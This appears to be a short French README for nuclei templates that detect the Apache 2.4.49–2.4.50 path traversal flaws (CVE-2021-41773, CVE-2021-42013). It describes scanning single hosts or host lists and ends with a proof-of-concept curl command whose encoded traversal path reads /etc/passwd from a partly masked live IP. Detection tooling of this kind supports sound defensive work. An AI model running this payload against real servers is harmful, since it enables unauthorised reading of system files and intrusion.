
Détecte les vulnérabilités de parcours de chemin du serveur HTTP Apache (CVE-2021-41773, CVE-2021-42013) en vérifiant l'exposition de /etc/passwd via diverses techniques de traversée.
Apache Version 2.4.49 and 2.4.50
(CVE-2021-41773) and (CVE-2021-42013)
Vous aurez besoin de nuclei !
https://github.com/projectdiscovery/nuclei
Vérifiez l'installation locale de nuclei et le template
nuclei -t apache-vulnerable-versions.yaml -vv
et
nuclei -t apache-path-traversal-rce-v2.yaml -vv
Vous devriez voir
[apache-vulnerable-versions] Vulnerable Apache Versions (2.4.49-2.4.50) (@psibot) [high]
et
[apache-path-traversal-passwd] Apache Path Traversal - /etc/passwd Exposure (@psibot) [critical]
Pour scanner une cible :
nuclei --silent -t apache-vulnerable-versions.yaml -u https://*.*.*.*:port
Pour scanner des cibles dans un fichier :
nuclei --silent -t apache-vulnerable-versions.yaml -l hosts.txt
apache-vulnerable-versions.yaml - Détecte la version d'Apache et affichera HIGH si vulnérable.

apache-path-traversal-rce-v2.yaml - Exécutera un exploit et montrera le chemin vulnérable. Affichera CRITICAL si vulnérable.

POC :
curl -s -k https://135.*.120.*:8443/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
